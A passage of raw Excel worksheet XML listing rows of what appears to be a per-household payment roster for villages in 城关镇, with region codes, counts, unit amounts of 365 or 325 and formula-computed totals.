      <c r="C669" s="17" t="s">
        <v>1713</v>
      </c>
      <c r="D669" s="17" t="s">
        <v>1813</v>
      </c>
      <c r="E669" s="17" t="s">
        <v>542</v>
      </c>
      <c r="F669" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G669" s="17">
        <v>1</v>
      </c>
      <c r="H669" s="18">
        <v>365</v>
      </c>
      <c r="I669" s="17">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J669" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K669" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="670" customHeight="1" spans="1:11">
      <c r="A670" s="16" t="s">
        <v>1814</v>
      </c>
      <c r="B670" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C670" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D670" s="17" t="s">
        <v>1815</v>
      </c>
      <c r="E670" s="17" t="s">
        <v>877</v>
      </c>
      <c r="F670" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G670" s="17">
        <v>1</v>
      </c>
      <c r="H670" s="18">
        <v>365</v>
      </c>
      <c r="I670" s="17">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J670" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K670" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="671" customHeight="1" spans="1:11">
      <c r="A671" s="16" t="s">
        <v>1816</v>
      </c>
      <c r="B671" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C671" s="17" t="s">
        <v>1817</v>
      </c>
      <c r="D671" s="17" t="s">
        <v>1818</v>
      </c>
      <c r="E671" s="17" t="s">
        <v>1732</v>
      </c>
      <c r="F671" s="17" t="s">
        <v>1215</v>
      </c>
      <c r="G671" s="17">
        <v>2</v>
      </c>
      <c r="H671" s="18">
        <v>345</v>
      </c>
      <c r="I671" s="17">
        <f t="shared" si="27"/>
        <v>690</v>
      </c>
      <c r="J671" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K671" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="672" customHeight="1" spans="1:11">
      <c r="A672" s="16" t="s">
        <v>1819</v>
      </c>
      <c r="B672" s="17" t="str">
        <f>B671</f>
        <v>城关镇</v>
      </c>
      <c r="C672" s="17" t="str">
        <f>C671</f>
        <v>城关沙坪</v>
      </c>
      <c r="D672" s="23" t="s">
        <v>1820</v>
      </c>
      <c r="E672" s="23" t="s">
        <v>1676</v>
      </c>
      <c r="F672" s="17" t="str">
        <f>F671</f>
        <v>4113210101</v>
      </c>
      <c r="G672" s="17"/>
      <c r="H672" s="17"/>
      <c r="I672" s="17"/>
      <c r="J672" s="17"/>
      <c r="K672" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="673" customHeight="1" spans="1:11">
      <c r="A673" s="16" t="s">
        <v>1821</v>
      </c>
      <c r="B673" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C673" s="17" t="s">
        <v>1822</v>
      </c>
      <c r="D673" s="17" t="s">
        <v>1823</v>
      </c>
      <c r="E673" s="17" t="s">
        <v>1824</v>
      </c>
      <c r="F673" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G673" s="17">
        <v>1</v>
      </c>
      <c r="H673" s="18">
        <v>365</v>
      </c>
      <c r="I673" s="17">
        <f t="shared" ref="I673:I686" si="28">H673*G673</f>
        <v>365</v>
      </c>
      <c r="J673" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K673" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="674" customHeight="1" spans="1:11">
      <c r="A674" s="16" t="s">
        <v>1825</v>
      </c>
      <c r="B674" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C674" s="17" t="s">
        <v>1822</v>
      </c>
      <c r="D674" s="17" t="s">
        <v>1826</v>
      </c>
      <c r="E674" s="17" t="s">
        <v>249</v>
      </c>
      <c r="F674" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G674" s="17">
        <v>1</v>
      </c>
      <c r="H674" s="18">
        <v>365</v>
      </c>
      <c r="I674" s="17">
        <f t="shared" si="28"/>
        <v>365</v>
      </c>
      <c r="J674" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K674" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="675" customHeight="1" spans="1:11">
      <c r="A675" s="16" t="s">
        <v>1827</v>
      </c>
      <c r="B675" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C675" s="17" t="s">
        <v>1822</v>
      </c>
      <c r="D675" s="17" t="s">
        <v>1828</v>
      </c>
      <c r="E675" s="17" t="s">
        <v>910</v>
      </c>
      <c r="F675" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G675" s="17">
        <v>1</v>
      </c>
      <c r="H675" s="18">
        <v>365</v>
      </c>
      <c r="I675" s="17">
        <f t="shared" si="28"/>
        <v>365</v>
      </c>
      <c r="J675" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K675" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="676" customHeight="1" spans="1:11">
      <c r="A676" s="16" t="s">
        <v>1829</v>
      </c>
      <c r="B676" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C676" s="17" t="s">
        <v>1822</v>
      </c>
      <c r="D676" s="17" t="s">
        <v>1830</v>
      </c>
      <c r="E676" s="17" t="s">
        <v>581</v>
      </c>
      <c r="F676" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G676" s="17">
        <v>1</v>
      </c>
      <c r="H676" s="18">
        <v>365</v>
      </c>
      <c r="I676" s="17">
        <f t="shared" si="28"/>
        <v>365</v>
      </c>
      <c r="J676" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K676" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="677" customHeight="1" spans="1:11">
      <c r="A677" s="16" t="s">
        <v>1831</v>
      </c>
      <c r="B677" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C677" s="17" t="s">
        <v>1822</v>
      </c>
      <c r="D677" s="17" t="s">
        <v>1832</v>
      </c>
      <c r="E677" s="17" t="s">
        <v>1833</v>
      </c>
      <c r="F677" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G677" s="17">
        <v>1</v>
      </c>
      <c r="H677" s="18">
        <v>365</v>
      </c>
      <c r="I677" s="17">
        <f t="shared" si="28"/>
        <v>365</v>
      </c>
      <c r="J677" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K677" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="678" customHeight="1" spans="1:11">
      <c r="A678" s="16" t="s">
        <v>1834</v>
      </c>
      <c r="B678" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C678" s="17" t="s">
        <v>1306</v>
      </c>
      <c r="D678" s="17" t="s">
        <v>1835</v>
      </c>
      <c r="E678" s="17" t="s">
        <v>405</v>
      </c>
      <c r="F678" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G678" s="17">
        <v>1</v>
      </c>
      <c r="H678" s="18">
        <v>365</v>
      </c>
      <c r="I678" s="17">
        <f t="shared" si="28"/>
        <v>365</v>
      </c>
      <c r="J678" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K678" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="679" customHeight="1" spans="1:11">
      <c r="A679" s="16" t="s">
        <v>1836</v>
      </c>
      <c r="B679" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C679" s="17" t="s">
        <v>1306</v>
      </c>
      <c r="D679" s="17" t="s">
        <v>1837</v>
      </c>
      <c r="E679" s="17" t="s">
        <v>1838</v>
      </c>
      <c r="F679" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G679" s="17">
        <v>1</v>
      </c>
      <c r="H679" s="18">
        <v>365</v>
      </c>
      <c r="I679" s="17">
        <f t="shared" si="28"/>
        <v>365</v>
      </c>
      <c r="J679" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K679" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="680" customHeight="1" spans="1:11">
      <c r="A680" s="16" t="s">
        <v>1839</v>
      </c>
      <c r="B680" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C680" s="17" t="s">
        <v>1306</v>
      </c>
      <c r="D680" s="17" t="s">
        <v>1840</v>
      </c>
      <c r="E680" s="17" t="s">
        <v>1066</v>
      </c>
      <c r="F680" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G680" s="17">
        <v>1</v>
      </c>
      <c r="H680" s="18">
        <v>365</v>
      </c>
      <c r="I680" s="17">
        <f t="shared" si="28"/>
        <v>365</v>
      </c>
      <c r="J680" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K680" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="681" customHeight="1" spans="1:11">
      <c r="A681" s="16" t="s">
        <v>1841</v>
      </c>
      <c r="B681" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C681" s="17" t="s">
        <v>1306</v>
      </c>
      <c r="D681" s="17" t="s">
        <v>1842</v>
      </c>
      <c r="E681" s="17" t="s">
        <v>910</v>
      </c>
      <c r="F681" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G681" s="17">
        <v>1</v>
      </c>
      <c r="H681" s="18">
        <v>365</v>
      </c>
      <c r="I681" s="17">
        <f t="shared" si="28"/>
        <v>365</v>
      </c>
      <c r="J681" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K681" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="682" customHeight="1" spans="1:11">
      <c r="A682" s="16" t="s">
        <v>1843</v>
      </c>
      <c r="B682" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C682" s="17" t="s">
        <v>1306</v>
      </c>
      <c r="D682" s="17" t="s">
        <v>1844</v>
      </c>
      <c r="E682" s="17" t="s">
        <v>292</v>
      </c>
      <c r="F682" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G682" s="17">
        <v>1</v>
      </c>
      <c r="H682" s="18">
        <v>365</v>
      </c>
      <c r="I682" s="17">
        <f t="shared" si="28"/>
        <v>365</v>
      </c>
      <c r="J682" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K682" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="683" customHeight="1" spans="1:11">
      <c r="A683" s="16" t="s">
        <v>1845</v>
      </c>
      <c r="B683" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C683" s="17" t="s">
        <v>1846</v>
      </c>
      <c r="D683" s="17" t="s">
        <v>1847</v>
      </c>
      <c r="E683" s="17" t="s">
        <v>761</v>
      </c>
      <c r="F683" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G683" s="17">
        <v>1</v>
      </c>
      <c r="H683" s="18">
        <v>365</v>
      </c>
      <c r="I683" s="17">
        <f t="shared" si="28"/>
        <v>365</v>
      </c>
      <c r="J683" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K683" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="684" customHeight="1" spans="1:11">
      <c r="A684" s="16" t="s">
        <v>1848</v>
      </c>
      <c r="B684" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C684" s="17" t="s">
        <v>1846</v>
      </c>
      <c r="D684" s="17" t="s">
        <v>1849</v>
      </c>
      <c r="E684" s="17" t="s">
        <v>1147</v>
      </c>
      <c r="F684" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G684" s="17">
        <v>1</v>
      </c>
      <c r="H684" s="18">
        <v>365</v>
      </c>
      <c r="I684" s="17">
        <f t="shared" si="28"/>
        <v>365</v>
      </c>
      <c r="J684" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K684" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="685" customHeight="1" spans="1:11">
      <c r="A685" s="16" t="s">
        <v>1850</v>
      </c>
      <c r="B685" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C685" s="17" t="s">
        <v>1846</v>
      </c>
      <c r="D685" s="17" t="s">
        <v>1851</v>
      </c>
      <c r="E685" s="17" t="s">
        <v>499</v>
      </c>
      <c r="F685" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G685" s="17">
        <v>1</v>
      </c>
      <c r="H685" s="18">
        <v>365</v>
      </c>
      <c r="I685" s="17">
        <f t="shared" si="28"/>
        <v>365</v>
      </c>
      <c r="J685" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K685" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="686" customHeight="1" spans="1:11">
      <c r="A686" s="16" t="s">
        <v>1852</v>
      </c>
      <c r="B686" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C686" s="17" t="s">
        <v>1846</v>
      </c>
      <c r="D686" s="17" t="s">
        <v>1853</v>
      </c>
      <c r="E686" s="17" t="s">
        <v>591</v>
      </c>
      <c r="F686" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G686" s="17">
        <v>2</v>
      </c>
      <c r="H686" s="18">
        <v>325</v>
      </c>
      <c r="I686" s="17">
        <f t="shared" si="28"/>
        <v>650</v>
      </c>
      <c r="J686" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K686" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="687" customHeight="1" spans="1:11">
      <c r="A687" s="16" t="s">
        <v>1854</v>
      </c>
      <c r="B687" s="17" t="str">
        <f>B686</f>
        <v>城关镇</v>
      </c>
      <c r="C687" s="17" t="str">
        <f>C686</f>
        <v>城关中华村</v>
      </c>
      <c r="D687" s="28" t="s">
        <v>1855</v>
      </c>
      <c r="E687" s="24" t="s">
        <v>1856</v>
      </c>
      <c r="F687" s="17" t="str">
        <f>F686</f>
        <v>4113210108</v>
      </c>
      <c r="G687" s="17"/>
      <c r="H687" s="17"/>
      <c r="I687" s="17"/>
      <c r="J687" s="17"/>
      <c r="K687" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="688" customHeight="1" spans="1:11">
      <c r="A688" s="16" t="s">
        <v>1857</v>
      </c>
      <c r="B688" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C688" s="17" t="s">
        <v>1846</v>
      </c>
      <c r="D688" s="17" t="s">
        <v>1858</v>
      </c>
      <c r="E688" s="17" t="s">
        <v>239</v>
      </c>
      <c r="F688" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G688" s="17">
        <v>2</v>
      </c>
      <c r="H688" s="18">
        <v>325</v>
      </c>
      <c r="I688" s="17">
        <f>H688*G688</f>
        <v>650</v>
      </c>
      <c r="J688" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K688" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="689" customHeight="1" spans="1:11">
      <c r="A689" s="16" t="s">
        <v>1859</v>
      </c>
      <c r="B689" s="17" t="str">
        <f>B688</f>
        <v>城关镇</v>
      </c>
      <c r="C689" s="17" t="str">
        <f>C688</f>
        <v>城关中华村</v>
      </c>
      <c r="D689" s="28" t="s">
        <v>1860</v>
      </c>
      <c r="E689" s="24" t="s">
        <v>1861</v>
      </c>
      <c r="F689" s="17" t="str">
        <f>F688</f>
        <v>4113210108</v>
      </c>
      <c r="G689" s="17"/>
      <c r="H689" s="17"/>
      <c r="I689" s="17"/>
      <c r="J689" s="17"/>
      <c r="K689" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="690" customHeight="1" spans="1:11">
      <c r="A690" s="16" t="s">
        <v>1862</v>
      </c>
      <c r="B690" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C690" s="17" t="s">
        <v>1846</v>
      </c>
      <c r="D690" s="17" t="s">
        <v>1863</v>
      </c>
      <c r="E690" s="17" t="s">
        <v>284</v>
      </c>
      <c r="F690" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G690" s="17">
        <v>1</v>
      </c>
      <c r="H690" s="18">
        <v>365</v>
      </c>
      <c r="I690" s="17">
        <f t="shared" ref="I690:I697" si="29">H690*G690</f>
        <v>365</v>
      </c>
      <c r="J690" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K690" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="691" customHeight="1" spans="1:11">
      <c r="A691" s="16" t="s">
        <v>1864</v>
      </c>
      <c r="B691" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C691" s="17" t="s">
        <v>1846</v>
      </c>
      <c r="D691" s="17" t="s">
        <v>1865</v>
      </c>
      <c r="E691" s="17" t="s">
        <v>1704</v>
      </c>
      <c r="F691" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G691" s="17">
        <v>1</v>
      </c>
      <c r="H691" s="18">
        <v>365</v>
      </c>
      <c r="I691" s="17">
        <f t="shared" si="29"/>
        <v>365</v>
      </c>
      <c r="J691" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K691" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="692" customHeight="1" spans="1:11">
      <c r="A692" s="16" t="s">
        <v>1866</v>
      </c>
      <c r="B692" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C692" s="17" t="s">
        <v>1867</v>
      </c>
      <c r="D692" s="17" t="s">
        <v>1868</v>
      </c>
      <c r="E692" s="17" t="s">
        <v>306</v>
      </c>
      <c r="F692" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G692" s="17">
        <v>1</v>
      </c>
      <c r="H692" s="18">
        <v>365</v>
      </c>
      <c r="I692" s="17">
        <f t="shared" si="29"/>
        <v>365</v>
      </c>
      <c r="J692" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K692" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="693" customHeight="1" spans="1:11">
      <c r="A693" s="16" t="s">
        <v>1869</v>
      </c>
      <c r="B693" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C693" s="17" t="s">
        <v>1867</v>
      </c>
      <c r="D693" s="17" t="s">
        <v>1870</v>
      </c>
      <c r="E693" s="17" t="s">
        <v>1871</v>
      </c>
      <c r="F693" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G693" s="17">
        <v>1</v>
      </c>
      <c r="H693" s="18">
        <v>365</v>
      </c>
      <c r="I693" s="17">
        <f t="shared" si="29"/>
        <v>365</v>
      </c>
      <c r="J693" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K693" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="694" customHeight="1" spans="1:11">
      <c r="A694" s="16" t="s">
        <v>1872</v>
      </c>
      <c r="B694" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C694" s="17" t="s">
        <v>1696</v>
      </c>
      <c r="D694" s="17" t="s">
        <v>1873</v>
      </c>
      <c r="E694" s="17" t="s">
        <v>1874</v>
      </c>
      <c r="F694" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G694" s="17">
        <v>1</v>
      </c>
      <c r="H694" s="18">
        <v>365</v>
      </c>
      <c r="I694" s="17">
        <f t="shared" si="29"/>
        <v>365</v>
      </c>
      <c r="J694" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K694" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="695" customHeight="1" spans="1:11">
      <c r="A695" s="16" t="s">
        <v>1875</v>
      </c>
      <c r="B695" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C695" s="17" t="s">
        <v>1713</v>
      </c>
      <c r="D695" s="17" t="s">
        <v>1876</v>
      </c>
      <c r="E695" s="17" t="s">
        <v>1877</v>
      </c>
      <c r="F695" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G695" s="17">
        <v>1</v>
      </c>
      <c r="H695" s="18">
        <v>365</v>
      </c>
      <c r="I695" s="17">
        <f t="shared" si="29"/>
        <v>365</v>
      </c>
      <c r="J695" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K695" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="696" customHeight="1" spans="1:11">
      <c r="A696" s="16" t="s">
        <v>1878</v>
      </c>
      <c r="B696" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C696" s="17" t="s">
        <v>1696</v>
      </c>
      <c r="D696" s="17" t="s">
        <v>1879</v>
      </c>
      <c r="E696" s="17" t="s">
        <v>1880</v>
      </c>
      <c r="F696" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G696" s="17">
        <v>1</v>
      </c>
      <c r="H696" s="18">
        <v>365</v>
      </c>
      <c r="I696" s="17">
        <f t="shared" si="29"/>
        <v>365</v>
      </c>
      <c r="J696" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K696" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="697" customHeight="1" spans="1:11">
      <c r="A697" s="16" t="s">
        <v>1881</v>
      </c>
      <c r="B697" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C697" s="17" t="s">
        <v>1822</v>
      </c>
      <c r="D697" s="17" t="s">
        <v>1882</v>
      </c>
      <c r="E697" s="17" t="s">
        <v>1265</v>
      </c>
      <c r="F697" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G697" s="17">
        <v>2</v>
      </c>
      <c r="H697" s="18">
        <v>325</v>
      </c>
      <c r="I697" s="17">
        <f t="shared" si="29"/>
        <v>650</v>
      </c>
      <c r="J697" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K697" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="698" customHeight="1" spans="1:11">
      <c r="A698" s="16" t="s">
        <v>1883</v>
      </c>
      <c r="B698" s="17" t="str">
        <f>B697</f>
        <v>城关镇</v>
      </c>
      <c r="C698" s="17" t="str">
        <f>C697</f>
        <v>城关东北村</v>
      </c>
      <c r="D698" s="28" t="s">
        <v>1884</v>
      </c>
      <c r="E698" s="24" t="s">
        <v>1885</v>
      </c>
      <c r="F698" s="17" t="str">
        <f>F697</f>
        <v>4113210103</v>
      </c>
      <c r="G698" s="17"/>
      <c r="H698" s="17"/>
      <c r="I698" s="17"/>
      <c r="J698" s="17"/>
      <c r="K698" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="699" customHeight="1" spans="1:11">
      <c r="A699" s="16" t="s">
        <v>1886</v>
      </c>
      <c r="B699" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C699" s="17" t="s">
        <v>1221</v>
      </c>
      <c r="D699" s="17" t="s">
        <v>1887</v>
      </c>
      <c r="E699" s="20" t="s">
        <v>1888</v>
      </c>
      <c r="F699" s="17" t="s">
        <v>1215</v>
      </c>
      <c r="G699" s="17">
        <v>1</v>
      </c>
      <c r="H699" s="18">
        <v>365</v>
      </c>
      <c r="I699" s="17">
        <f t="shared" ref="I699:I710" si="30">H699*G699</f>
        <v>365</v>
      </c>
      <c r="J699" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K699" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="700" customHeight="1" spans="1:11">
      <c r="A700" s="16" t="s">
        <v>1889</v>
      </c>
      <c r="B700" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C700" s="17" t="s">
        <v>1783</v>
      </c>
      <c r="D700" s="17" t="s">
        <v>1890</v>
      </c>
      <c r="E700" s="17" t="s">
        <v>435</v>
      </c>
      <c r="F700" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G700" s="17">
        <v>1</v>
      </c>
      <c r="H700" s="18">
        <v>365</v>
      </c>
      <c r="I700" s="17">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J700" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K700" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="701" customHeight="1" spans="1:11">
      <c r="A701" s="16" t="s">
        <v>1891</v>
      </c>
      <c r="B701" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C701" s="17" t="s">
        <v>1713</v>
      </c>
      <c r="D701" s="17" t="s">
        <v>1892</v>
      </c>
      <c r="E701" s="17" t="s">
        <v>303</v>
      </c>
      <c r="F701" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G701" s="17">
        <v>1</v>
      </c>
      <c r="H701" s="18">
        <v>365</v>
      </c>
      <c r="I701" s="17">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J701" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K701" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="702" customHeight="1" spans="1:11">
      <c r="A702" s="16" t="s">
        <v>1893</v>
      </c>
      <c r="B702" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C702" s="17" t="s">
        <v>1713</v>
      </c>
      <c r="D702" s="17" t="s">
        <v>1894</v>
      </c>
      <c r="E702" s="17" t="s">
        <v>1895</v>
      </c>
      <c r="F702" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G702" s="17">
        <v>1</v>
      </c>
      <c r="H702" s="18">
        <v>365</v>
      </c>
      <c r="I702" s="17">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J702" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K702" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="703" customHeight="1" spans="1:11">
      <c r="A703" s="16" t="s">
        <v>1896</v>
      </c>
      <c r="B703" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C703" s="17" t="s">
        <v>1688</v>
      </c>
      <c r="D703" s="17" t="s">
        <v>1897</v>
      </c>
      <c r="E703" s="17" t="s">
        <v>526</v>
      </c>
      <c r="F703" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G703" s="17">
        <v>1</v>
      </c>
      <c r="H703" s="18">
        <v>365</v>
      </c>
      <c r="I703" s="17">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J703" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K703" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="704" customHeight="1" spans="1:11">
      <c r="A704" s="16" t="s">
        <v>1898</v>
      </c>
      <c r="B704" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C704" s="17" t="s">
        <v>1688</v>
      </c>
      <c r="D704" s="17" t="s">
        <v>1899</v>
      </c>
      <c r="E704" s="17" t="s">
        <v>1900</v>
      </c>
      <c r="F704" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G704" s="17">
        <v>1</v>
      </c>
      <c r="H704" s="18">
        <v>365</v>
      </c>
      <c r="I704" s="17">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J704" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K704" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="705" customHeight="1" spans="1:11">
      <c r="A705" s="16" t="s">
        <v>1901</v>
      </c>
      <c r="B705" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C705" s="17" t="s">
        <v>1902</v>
      </c>
      <c r="D705" s="17" t="s">
        <v>1903</v>
      </c>
      <c r="E705" s="17" t="s">
        <v>1904</v>
      </c>
      <c r="F705" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G705" s="17">
        <v>1</v>
      </c>
      <c r="H705" s="18">
        <v>365</v>
      </c>
      <c r="I705" s="17">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J705" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K705" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="706" customHeight="1" spans="1:11">
      <c r="A706" s="16" t="s">
        <v>1905</v>
      </c>
      <c r="B706" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C706" s="17" t="s">
        <v>1688</v>
      </c>
      <c r="D706" s="17" t="s">
        <v>1906</v>
      </c>
      <c r="E706" s="17" t="s">
        <v>269</v>
      </c>
      <c r="F706" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G706" s="17">
        <v>1</v>
      </c>
      <c r="H706" s="18">
        <v>365</v>
      </c>
      <c r="I706" s="17">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J706" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K706" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="707" customHeight="1" spans="1:11">
      <c r="A707" s="16" t="s">
        <v>1907</v>
      </c>
      <c r="B707" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C707" s="17" t="s">
        <v>1688</v>
      </c>
      <c r="D707" s="17" t="s">
        <v>1908</v>
      </c>
      <c r="E707" s="17" t="s">
        <v>269</v>
      </c>
      <c r="F707" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G707" s="17">
        <v>1</v>
      </c>
      <c r="H707" s="18">
        <v>365</v>
      </c>
      <c r="I707" s="17">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J707" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K707" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="708" customHeight="1" spans="1:11">
      <c r="A708" s="16" t="s">
        <v>1909</v>
      </c>
      <c r="B708" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C708" s="17" t="s">
        <v>1910</v>
      </c>
      <c r="D708" s="17" t="s">
        <v>1911</v>
      </c>
      <c r="E708" s="17" t="s">
        <v>499</v>
      </c>
      <c r="F708" s="17" t="s">
        <v>1215</v>
      </c>
      <c r="G708" s="17">
        <v>1</v>
      </c>
      <c r="H708" s="18">
        <v>365</v>
      </c>
      <c r="I708" s="17">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J708" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K708" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="709" customHeight="1" spans="1:11">
      <c r="A709" s="16" t="s">
        <v>1912</v>
      </c>
      <c r="B709" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C709" s="17" t="s">
        <v>1688</v>
      </c>
      <c r="D709" s="17" t="s">
        <v>1913</v>
      </c>
      <c r="E709" s="17" t="s">
